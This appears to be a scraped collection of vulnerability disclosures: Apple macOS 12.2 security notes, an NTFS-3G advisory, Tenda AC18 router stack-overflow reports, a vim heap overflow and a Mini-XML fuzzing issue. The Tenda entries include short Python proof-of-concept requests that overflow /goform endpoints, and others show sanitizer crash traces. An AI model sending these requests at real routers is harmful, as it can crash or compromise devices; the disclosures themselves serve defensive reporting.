An event handler validation issue in the XPC Services API was addressed by removing the service. This issue is fixed in macOS Monterey 12.2. An application may be able to delete files for which it does not have permission.

Released January 26, 2022

**AMD Kernel**

Available for: macOS Monterey

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-22586: an anonymous researcher

**ColorSync**

Available for: macOS Monterey

Impact: Processing a maliciously crafted file may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved validation.

CVE-2022-22584: Mickey Jin (@patch1t) of Trend Micro

**Crash Reporter**

Available for: macOS Monterey

Impact: A malicious application may be able to gain root privileges

Description: A logic issue was addressed with improved validation.

CVE-2022-22578: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020) of Tencent Security Xuanwu Lab (xlab.tencent.com)

Entry updated May 25, 2022

**iCloud**

Available for: macOS Monterey

Impact: An application may be able to access a user's files

Description: An issue existed within the path validation logic for symlinks. This issue was addressed with improved path sanitization.

CVE-2022-22585: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab (https://xlab.tencent.com)

**Intel Graphics Driver**

Available for: macOS Monterey

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2022-22591: Antonio Zekic (@antoniozekic) of Diverto

**IOMobileFrameBuffer**

Available for: macOS Monterey

Impact: A malicious application may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited.

Description: A memory corruption issue was addressed with improved input validation.

CVE-2022-22587: an anonymous researcher, Meysam Firouzi (@R00tkitSMM) of MBition - Mercedes-Benz Innovation Lab, Siddharth Aeri (@b1n4r1b01)

**Kernel**

Available for: macOS Monterey

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: A buffer overflow issue was addressed with improved memory handling.

CVE-2022-22593: Peter Nguyễn Vũ Hoàng of STAR Labs

**Model I/O**

Available for: macOS Monterey

Impact: Processing a maliciously crafted STL file may lead to unexpected application termination or arbitrary code execution

Description: An information disclosure issue was addressed with improved state management.

CVE-2022-22579: Mickey Jin (@patch1t) of Trend Micro

**PackageKit**

Available for: macOS Monterey

Impact: An application may be able to delete files for which it does not have permission

Description: An event handler validation issue in the XPC Services API was addressed by removing the service. 

CVE-2022-22676: Mickey Jin (@patch1t) of Trend Micro

Entry added May 25, 2022

**PackageKit**

Available for: macOS Monterey

Impact: An application may be able to access restricted files

Description: A permissions issue was addressed with improved validation.

CVE-2022-22583: Ron Hass (@ronhass7) of Perception Point, Mickey Jin (@patch1t)

Entry updated May 25, 2022

**WebKit**

Available for: macOS Monterey

Impact: Processing a maliciously crafted mail message may lead to running arbitrary javascript

Description: A validation issue was addressed with improved input sanitization.

CVE-2022-22589: Heige of KnownSec 404 Team (knownsec.com) and Bo Qu of Palo Alto Networks (paloaltonetworks.com)

**WebKit**

Available for: macOS Monterey

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A use after free issue was addressed with improved memory management.

CVE-2022-22590: Toan Pham from Team Orca of Sea Security (security.sea.com)

**WebKit**

Available for: macOS Monterey

Impact: Processing maliciously crafted web content may prevent Content Security Policy from being enforced

Description: A logic issue was addressed with improved state management.

CVE-2022-22592: Prakash (@1lastBr3ath)

**WebKit Storage**

Available for: macOS Monterey

Impact: A website may be able to track sensitive user information

Description: A cross-origin issue in the IndexDB API was addressed with improved input validation.

CVE-2022-22594: Martin Bajanik of FingerprintJS

CVE-2022-22676: About the security content of macOS Monterey 12.2

A crafted NTFS image can cause a heap-based buffer overflow in ntfs_check_log_client_array in NTFS-3G through 2021.8.22.

Security vulnerabilities were identified in the open source NTFS-3G and  
NTFSPROGS software. These vulnerabilities were confirmed and resolved.  
To our knowledge, these vulnerabilities have not been exploited.

These vulnerabilities may allow an attacker using a maliciously crafted  
NTFS-formatted image file or external storage to potentially execute  
arbitrary privileged code, if the attacker has either local access and  
the ntfs-3g binary is setuid root, or if the attacker has physical  
access to an external port to a computer which is configured to run the  
ntfs-3g binary or one of the ntfsprogs tools when the external storage  
is plugged into the computer. These vulnerabilities result from  
incorrect validation of some of the NTFS metadata that could potentially  
cause buffer overflows, which could be exploited by an attacker. Common  
ways for attackers to gain physical access to a machine is through  
social engineering or an evil maid attack on an unattended computer.

We recommend installing and applying the update with the security fixes,  
and advise to follow security guidance and frameworks such as NIST for  
assessing and improving an organization’s abilities to prevent, detect,  
and respond to security threats and cyber attacks.

AFFECTED PRODUCTS: All previous versions of open source NTFS-3G and  
NTFSPROGS.

WORKAROUND: None

SOLUTION: Upgrade to 2022.5.17

PROJECT URL: https://github.com/tuxera/ntfs-3g

ADVISORY ID: NTFS3G-SA-2022-0001

ISSUE DATE: 2022-05-26

SEVERITY: Moderate

CVEs: CVE-2021-46790, CVE-2022-30784, CVE-2022-30786, CVE-2022-30788, CVE-2022-30789

CVSS SCORE: 5.0-6.7

CVE-2022-30789

Tenda AC Series Router AC18_V15.03.05.19(6318) was discovered to contain a stack-based buffer overflow in the httpd module when handling /goform/SetClientState request.

**Tenda Router AC18 Vulnerability**

This vulnerability lies in the /goform/SetClientState page which influences the lastest version of Tenda Router AC18. (The latest version is AC18\_V15.03.05.19(6318))

**Vulnerability Description**

There is a **stack-based buffer overflow** vulnerability in function formSetClientState.

In function formSetClientState it reads user provided parameter deviceId into v9, and this variable is passed into function sprintf without any length check, which may overflow the stack-based buffer s.

So by requesting the page /goform/SetClientState, the attacker can easily perform a **Deny of Service Attack** or **Remote Code Execution** with carefully crafted overflow data.

**PoC**

import requests

IP \= "10.10.10.1"
url \= f"http://{IP}/goform/SetClientState?"
url += "limitEn=1&deviceId=" + "s" \* 0x500

response \= requests.get(url)

**Timeline**

*   2022-05-07: Report to CVE & CNVD;
*   2022-05-26: CVE ID assigned (CVE-2022-30477)

**Acknowledge**

Credit to @peanuts and @cylin from IIE, CAS.

CVE-2022-30477: VulnRepo/IoT/Tenda/4 at master · lcyfrank/VulnRepo

Tenda AC Series Router AC18_V15.03.05.19(6318) was discovered to contain a stack-based buffer overflow in the httpd module when handling /goform/SetFirewallCfg request.

**Tenda Router AC18 Vulnerability**

This vulnerability lies in the /goform/SetFirewallCfg page which influences the lastest version of Tenda Router AC18. (The latest version is AC18\_V15.03.05.19(6318))

**Vulnerability Description**

There is a **stack-based buffer overflow** vulnerability in function formSetFirewallCfg.

In function formSetFirewallCfg it reads user provided parameter firewallEn into src, and this variable is passed into function strcpy without any length check, which may overflow the stack-based buffer dest.

So by requesting the page /goform/SetFirewallCfg, the attacker can easily perform a **Deny of Service Attack** or **Remote Code Execution** with carefully crafted overflow data.

**PoC**

import requests

IP \= "10.10.10.1"
url \= f"http://{IP}/goform/SetFirewallCfg?"
url += "firewallEn=" + "s" \* 0x500

response \= requests.get(url)

**Timeline**

*   2022-05-07: Report to CVE & CNVD;
*   2022-05-26: CVE ID assigned (CVE-2022-30476)

**Acknowledge**

Credit to @peanuts and @cylin from IIE, CAS.

CVE-2022-30476: VulnRepo/IoT/Tenda/6 at master · lcyfrank/VulnRepo

Tenda AC Series Router AC18_V15.03.05.19(6318) was discovered to contain a stack-based buffer overflow in the httpd module when handling /goform/WifiExtraSet request.

**Tenda Router AC18 Vulnerability**

This vulnerability lies in the /goform/WifiExtraSet page which influences the lastest version of Tenda Router AC18. (The latest version is AC18\_V15.03.05.19(6318))

**Vulnerability Description**

There is a **stack-based buffer overflow** vulnerability in function fromSetWirelessRepeat.

In function fromSetWirelessRepeat it reads user provided parameter wpapsk_crypto into victim_buf, and this variable is passed into function strcpy without any length check, which may overflow the stack-based buffer vuln_buf.

So by requesting the page /goform/WifiExtraSet, the attacker can easily perform a **Deny of Service Attack**.

**PoC**

import requests

IP \= "10.10.10.1"
url \= f"http://{IP}/goform/WifiExtraSet?"
url += "wl\_mode=not\_ap&security=wpapsk&wpapsk\_key=kkkkkkkk&wpapsk\_crypto=" + "s" \* 0x600

response \= requests.get(url)

**Timeline**

*   2022-05-07: Report to CVE & CNVD;
*   2022-05-26: CVE ID assigned (CVE-2022-30475)

**Acknowledge**

Credit to @peanuts and @cylin from IIE, CAS.

CVE-2022-30475: VulnRepo/IoT/Tenda/3 at master · lcyfrank/VulnRepo

Tenda AC Seris Router AC18_V15.03.05.19(6318) has a stack-based buffer overflow vulnerability in function fromAddressNat

**Tenda Router AC18 Vulnerability**

This vulnerability lies in the /goform/addressNat page which influences the lastest version of Tenda Router AC18. (The latest version is AC18\_V15.03.05.19(6318))

**Vulnerability Description**

There is a **stack-based buffer overflow** vulnerability in function fromAddressNat.

In function fromAddressNat it reads 2 user provided parameters entrys and mitInterface into v9 and v8, and these two variables are passed into function sprintf without any length check, which may overflow the stack-based buffer s.

So by requesting the page /goform/addressNat, the attacker can easily perform a **Deny of Service Attack** or **Remote Code Execution** with carefully crafted overflow data.

**PoC**

import requests

IP \= "10.10.10.1"
url \= f"http://{IP}/goform/addressNat?"
url += "entrys=" + "s" \* 0x200
url += "&mitInterface=" + "a" \* 0x200

response \= requests.get(url)

**Timeline**

*   2022-05-05: Report to CVE & CNVD;
*   2022-05-26: CVE ID assigned (CVE-2022-30472)

**Acknowledge**

Credit to @peanuts and @cylin from IIE, CAS.

CVE-2022-30472: VulnRepo/IoT/Tenda/1 at master · lcyfrank/VulnRepo

Tenda AC Series Router AC18_V15.03.05.19(6318) has a stack-based buffer overflow vulnerability in function form_fast_setting_wifi_set

**Tenda Router AC18 Vulnerability**

This vulnerability lies in the /goform/fast_setting_wifi_set page which influences the lastest version of Tenda Router AC18. (The latest version is AC18\_V15.03.05.19(6318))

**Vulnerability Description**

There is a **stack-based buffer overflow** vulnerability in function form_fast_setting_wifi_set.

In function form_fast_setting_wifi_set it reads user provided parameter ssid into src, and this variable is passed into function strcpy without any length check, which may overflow the stack-based buffer s.

So by requesting the page /goform/fast_setting_wifi_set, the attacker can easily perform a **Deny of Service Attack**.

**PoC**

import requests

IP \= "10.10.10.1"
url \= f"http://{IP}/goform/fast\_setting\_wifi\_set?"
url += "ssid=" + "s" \* 100

response \= requests.get(url)

**Timeline**

*   2022-05-06: Report to CVE & CNVD;
*   2022-05-26: CVE ID assigned (CVE-2022-30473)

**Acknowledge**

Credit to @peanuts and @cylin from IIE, CAS.

CVE-2022-30473: VulnRepo/IoT/Tenda/2 at master · lcyfrank/VulnRepo

Heap-based Buffer Overflow in GitHub repository vim/vim prior to 8.2.

**Description**

Heap-based Buffer Overflow in function utf\_head\_off at mbyte.c:3872

**vim Version**

    git log 
    commit 68e64d2c1735f2a39afa8a0475ae29bedb116684 (HEAD -> master, tag: v8.2.5006, origin/master, origin/HEAD)
    

**POC**

    ./vim -u NONE -i NONE -n -m -X -Z -e -s -S poc_h6_s.dat -c :qa!
    =================================================================
    ==48342==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000860f at pc 0x000000a467fd bp 0x7fffffff6800 sp 0x7fffffff67f8
    READ of size 1 at 0x60200000860f thread T0
        #0 0xa467fc in utf_head_off /home/fuzz/fuzz/vim/vim/src/mbyte.c:3872:9
        #1 0xe02062 in do_put /home/fuzz/fuzz/vim/vim/src/register.c:2223:7
        #2 0xb6dbb3 in nv_put_opt /home/fuzz/fuzz/vim/vim/src/normal.c:7351:2
        #3 0xb55466 in nv_brackets /home/fuzz/fuzz/vim/vim/src/normal.c:4514:2
        #4 0xb1fed1 in normal_cmd /home/fuzz/fuzz/vim/vim/src/normal.c:930:5
        #5 0x813d5e in exec_normal /home/fuzz/fuzz/vim/vim/src/ex_docmd.c:8762:6
        #6 0x813588 in exec_normal_cmd /home/fuzz/fuzz/vim/vim/src/ex_docmd.c:8725:5
        #7 0x813139 in ex_normal /home/fuzz/fuzz/vim/vim/src/ex_docmd.c:8643:6
        #8 0x7dc249 in do_one_cmd /home/fuzz/fuzz/vim/vim/src/ex_docmd.c:2567:2
        #9 0x7c9005 in do_cmdline /home/fuzz/fuzz/vim/vim/src/ex_docmd.c:992:17
        #10 0xe57a2c in do_source_ext /home/fuzz/fuzz/vim/vim/src/scriptfile.c:1674:5
        #11 0xe54486 in do_source /home/fuzz/fuzz/vim/vim/src/scriptfile.c:1801:12
        #12 0xe53dbc in cmd_source /home/fuzz/fuzz/vim/vim/src/scriptfile.c:1174:14
        #13 0xe5349e in ex_source /home/fuzz/fuzz/vim/vim/src/scriptfile.c:1200:2
        #14 0x7dc249 in do_one_cmd /home/fuzz/fuzz/vim/vim/src/ex_docmd.c:2567:2
        #15 0x7c9005 in do_cmdline /home/fuzz/fuzz/vim/vim/src/ex_docmd.c:992:17
        #16 0x7cdc51 in do_cmdline_cmd /home/fuzz/fuzz/vim/vim/src/ex_docmd.c:586:12
        #17 0x1423782 in exe_commands /home/fuzz/fuzz/vim/vim/src/main.c:3106:2
        #18 0x141f91b in vim_main2 /home/fuzz/fuzz/vim/vim/src/main.c:780:2
        #19 0x1415015 in main /home/fuzz/fuzz/vim/vim/src/main.c:432:12
        #20 0x7ffff7bec082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
        #21 0x41ea6d in _start (/home/fuzz/fuzz/vim/vim/src/vim+0x41ea6d)
    
    0x60200000860f is located 1 bytes to the left of 1-byte region [0x602000008610,0x602000008611)
    allocated by thread T0 here:
        #0 0x499ccd in malloc (/home/fuzz/fuzz/vim/vim/src/vim+0x499ccd)
        #1 0x4cb3aa in lalloc /home/fuzz/fuzz/vim/vim/src/alloc.c:246:11
        #2 0x4cb28a in alloc /home/fuzz/fuzz/vim/vim/src/alloc.c:151:12
        #3 0xf8c1f6 in vim_strsave /home/fuzz/fuzz/vim/vim/src/strings.c:27:9
        #4 0xdf2757 in get_register /home/fuzz/fuzz/vim/vim/src/register.c:310:25
        #5 0xb6cfa7 in nv_put_opt /home/fuzz/fuzz/vim/vim/src/normal.c:7307:10
        #6 0xb55466 in nv_brackets /home/fuzz/fuzz/vim/vim/src/normal.c:4514:2
        #7 0xb1fed1 in normal_cmd /home/fuzz/fuzz/vim/vim/src/normal.c:930:5
        #8 0x813d5e in exec_normal /home/fuzz/fuzz/vim/vim/src/ex_docmd.c:8762:6
        #9 0x813588 in exec_normal_cmd /home/fuzz/fuzz/vim/vim/src/ex_docmd.c:8725:5
        #10 0x813139 in ex_normal /home/fuzz/fuzz/vim/vim/src/ex_docmd.c:8643:6
        #11 0x7dc249 in do_one_cmd /home/fuzz/fuzz/vim/vim/src/ex_docmd.c:2567:2
        #12 0x7c9005 in do_cmdline /home/fuzz/fuzz/vim/vim/src/ex_docmd.c:992:17
        #13 0xe57a2c in do_source_ext /home/fuzz/fuzz/vim/vim/src/scriptfile.c:1674:5
        #14 0xe54486 in do_source /home/fuzz/fuzz/vim/vim/src/scriptfile.c:1801:12
        #15 0xe53dbc in cmd_source /home/fuzz/fuzz/vim/vim/src/scriptfile.c:1174:14
        #16 0xe5349e in ex_source /home/fuzz/fuzz/vim/vim/src/scriptfile.c:1200:2
        #17 0x7dc249 in do_one_cmd /home/fuzz/fuzz/vim/vim/src/ex_docmd.c:2567:2
        #18 0x7c9005 in do_cmdline /home/fuzz/fuzz/vim/vim/src/ex_docmd.c:992:17
        #19 0x7cdc51 in do_cmdline_cmd /home/fuzz/fuzz/vim/vim/src/ex_docmd.c:586:12
        #20 0x1423782 in exe_commands /home/fuzz/fuzz/vim/vim/src/main.c:3106:2
        #21 0x141f91b in vim_main2 /home/fuzz/fuzz/vim/vim/src/main.c:780:2
        #22 0x1415015 in main /home/fuzz/fuzz/vim/vim/src/main.c:432:12
        #23 0x7ffff7bec082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /home/fuzz/fuzz/vim/vim/src/mbyte.c:3872:9 in utf_head_off
    Shadow bytes around the buggy address:
      0x0c047fff9070: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
      0x0c047fff9080: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
      0x0c047fff9090: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
      0x0c047fff90a0: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
      0x0c047fff90b0: fa fa fd fa fa fa 02 fa fa fa 04 fa fa fa 01 fa
    =>0x0c047fff90c0: fa[fa]01 fa fa fa 02 fa fa fa 01 fa fa fa 01 fa
      0x0c047fff90d0: fa fa 01 fa fa fa 02 fa fa fa fd fd fa fa fd fa
      0x0c047fff90e0: fa fa fd fd fa fa 00 04 fa fa 00 00 fa fa 00 04
      0x0c047fff90f0: fa fa fd fa fa fa fd fd fa fa fd fd fa fa fa fa
      0x0c047fff9100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff9110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==48342==ABORTING
    

poc\_h6\_s.dat

**Impact**

This vulnerabilities are capable of crashing software, Modify Memory, and possible remote execution.

CVE-2022-1886: Heap-based Buffer Overflow in function utf_head_off in vim

This advisory contains mitigations for Out-of-bounds Write, Out-of-bounds Read, and Heap-based Buffer Overflow vulnerabilities in Horner Automation Cscape PLC management software.

Horner Automation Cscape Csfont

A stack buffer overflow exists in Mini-XML v3.2. When inputting an unformed XML string to the mxmlLoadString API, it will cause a stack-buffer-overflow in mxml_string_getc:2611.

Hi,

We have used Mini-xml in our project, so I test v3.2 and master branch and found something:

Fisrt, there are some memory leaks in v3.2 and master:

    =================================================================
    ==111401==ERROR: LeakSanitizer: detected memory leaks
    
    Direct leak of 6 byte(s) in 1 object(s) allocated from:
        #0 in strdup (/opt/mnt/software/mxml32/a.out+0x46f260)
        #1 in mxmlSaveAllocString /opt/mnt/software/mxml32/mxml-file.c:227:13
        #2 in LLVMFuzzerTestOneInput /opt/mnt/software/mxml32/mxml_fuzzer.cpp:23:8
        #3 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) (/opt/mnt/software/mxml32/a     .out+0x42f357)
        #4 in fuzzer::Fuzzer::MutateAndTestOne() (/opt/mnt/software/mxml32/a.out+0x439bc4)
        #5 in fuzzer::Fuzzer::Loop(std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::a     llocator<char> >, fuzzer::fuzzer_allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<     char> > > > const&) (/opt/mnt/software/mxml32/a.out+0x43b22f)
        #6 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) (/opt/mnt/soft     ware/mxml32/a.out+0x42a5ec)
        #7 in main (/opt/mnt/software/mxml32/a.out+0x41d4b2)
        #8 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
    
    SUMMARY: AddressSanitizer: 6 byte(s) leaked in 1 allocation(s).
    INFO: to ignore leaks on libFuzzer side use -detect_leaks=0.
    

and :  
this is your testmxml.c:

    ...
    Creating libmxml.so.1.6...
    Creating libmxml.a...
    a - mxml-attr.o
    a - mxml-entity.o
    a - mxml-file.o
    a - mxml-get.o
    a - mxml-index.o
    a - mxml-node.o
    a - mxml-search.o
    a - mxml-set.o
    a - mxml-private.o
    a - mxml-string.o
    Compiling testmxml.c
    Linking testmxml...
    Testing library...
    
    =================================================================
    ==113129==ERROR: LeakSanitizer: detected memory leaks
    
    Direct leak of 88 byte(s) in 1 object(s) allocated from:
        #0 in calloc (/opt/mnt/software/mxml32/testmxml+0x4da178)
        #1 in mxml_new /opt/mnt/software/mxml32/mxml-node.c:841:15
        #2 in mxmlNewElement /opt/mnt/software/mxml32/mxml-node.c:382:15
        #3 in mxml_load_data /opt/mnt/software/mxml32/mxml-file.c:1783:14
        #4 in mxmlSAXLoadFile /opt/mnt/software/mxml32/mxml-file.c:467:11
        #5 in main /opt/mnt/software/mxml32/testmxml.c:676:5
        #6 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
    
    Indirect leak of 37 byte(s) in 1 object(s) allocated from:
        #0 in __interceptor_strdup (/opt/mnt/software/mxml32/testmxml+0x436770)
        #1 in mxmlNewElement /opt/mnt/software/mxml32/mxml-node.c:383:32
        #2 in mxml_load_data /opt/mnt/software/mxml32/mxml-file.c:1783:14
        #3 in mxmlSAXLoadFile /opt/mnt/software/mxml32/mxml-file.c:467:11
        #4 in main /opt/mnt/software/mxml32/testmxml.c:676:5
        #5 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
    
    SUMMARY: AddressSanitizer: 125 byte(s) leaked in 2 allocation(s).
    Makefile:271: recipe for target 'testmxml' failed
    make: *** [testmxml] Error 1
    

also ,we I input an unformed string to mxmlLoadString, there will be a stack-buffer-overflow and heap-buffer-overflow. I think if you add a longth check in mxml\_string\_getc when every pointer change("like (\*s)++"), will be better? Of course Maybe I have use it in a wrong . you can check it here:  
this is my testcase:

    #include <string>
    #include <vector>
    #include <assert.h>
    #include "mxml.h"
    
    extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {
    
    std::string c(reinterpret_cast<const char *>(data), size);
    
    char *ptr;
    
    mxml_node_t *tree;
    
    tree = mxmlLoadString(NULL, c.c_str(), MXML_NO_CALLBACK);
    
    if(tree){
            ptr = mxmlSaveAllocString(tree, MXML_NO_CALLBACK);
            if(!ptr) assert(false);
            mxmlDelete(tree);
    }
    
    return 0;
    }
    
    

you can compile your lib with  
CFLAGS =+ "-g -O0 -fno-omit-frame-pointer -gline-tables-only -fsanitize=address -fsanitize-address-use-after-scope -fsanitize=fuzzer-no-link" and  
LDFLAGS =+"-fsanitize=fuzzer-no-link -fsanitize=address"  
and  
clang++ -g -O1 -fno-omit-frame-pointer -gline-tables-only -fsanitize=address -fsanitize-address-use-after-scope -fsanitize=fuzzer-no-link mxml\_fuzzer.cpp -I ./ -fsanitize=fuzzer ./libmxml.a

run and these are the backtrace:

    =================================================================
    ==2858==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffed9190220 at pc 0x00000055a6f2 bp 0x7ffed918edc0 sp 0x7ffed918edb8
    READ of size 1 at 0x7ffed9190220 thread T0
        #0 in mxml_string_getc /opt/mnt/software/mxml32/mxml-file.c:2611:16
        #1 in mxml_parse_element /opt/mnt/software/mxml32/mxml-file.c:2141:16
        #2 in mxml_load_data /opt/mnt/software/mxml32/mxml-file.c:1977:14
        #3 in mxmlLoadString /opt/mnt/software/mxml32/mxml-file.c:180:11
        #4 in LLVMFuzzerTestOneInput /opt/mnt/software/mxml32/mxml_fuzzer.cpp:12:8
        #5 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) (/opt/mnt/software/mxml32/a.out+0x42f357)
        #6 in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) (/opt/mnt/software/mxml32/a.out+0x41f7ea)
        #7 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) (/opt/mnt/software/mxml32/a.out+0x42a7b0)
        #8 in main (/opt/mnt/software/mxml32/a.out+0x41d4b2)
        #9 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
        #10 in _start (/opt/mnt/software/mxml32/a.out+0x41d529)
    

    =================================================================
    ==6265==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x612000000a73 at pc 0x000000558e2d bp 0x7ffe13e2caa0 sp 0x7ffe13e2ca98
    READ of size 1 at 0x612000000a73 thread T0
        #0 in mxml_string_getc /opt/mnt/software/mxml32/mxml-file.c:2422:13
        #1 in mxml_load_data /opt/mnt/software/mxml32/mxml-file.c:1558:20
        #2 in mxmlLoadString /opt/mnt/software/mxml32/mxml-file.c:180:11
        #3 in LLVMFuzzerTestOneInput /opt/mnt/software/mxml32/mxml_fuzzer.cpp:12:8
        #4 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) (/opt/mnt/software/mxml32/a.out+0x42f357)
        #5 in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) (/opt/mnt/software/mxml32/a.out+0x41f7ea)
        #6 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) (/opt/mnt/software/mxml32/a.out+0x42a7b0)
        #7 in main (/opt/mnt/software/mxml32/a.out+0x41d4b2)
        #8 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
        #9 in _start (/opt/mnt/software/mxml32/a.out+0x41d529)

Tag

#buffer_overflow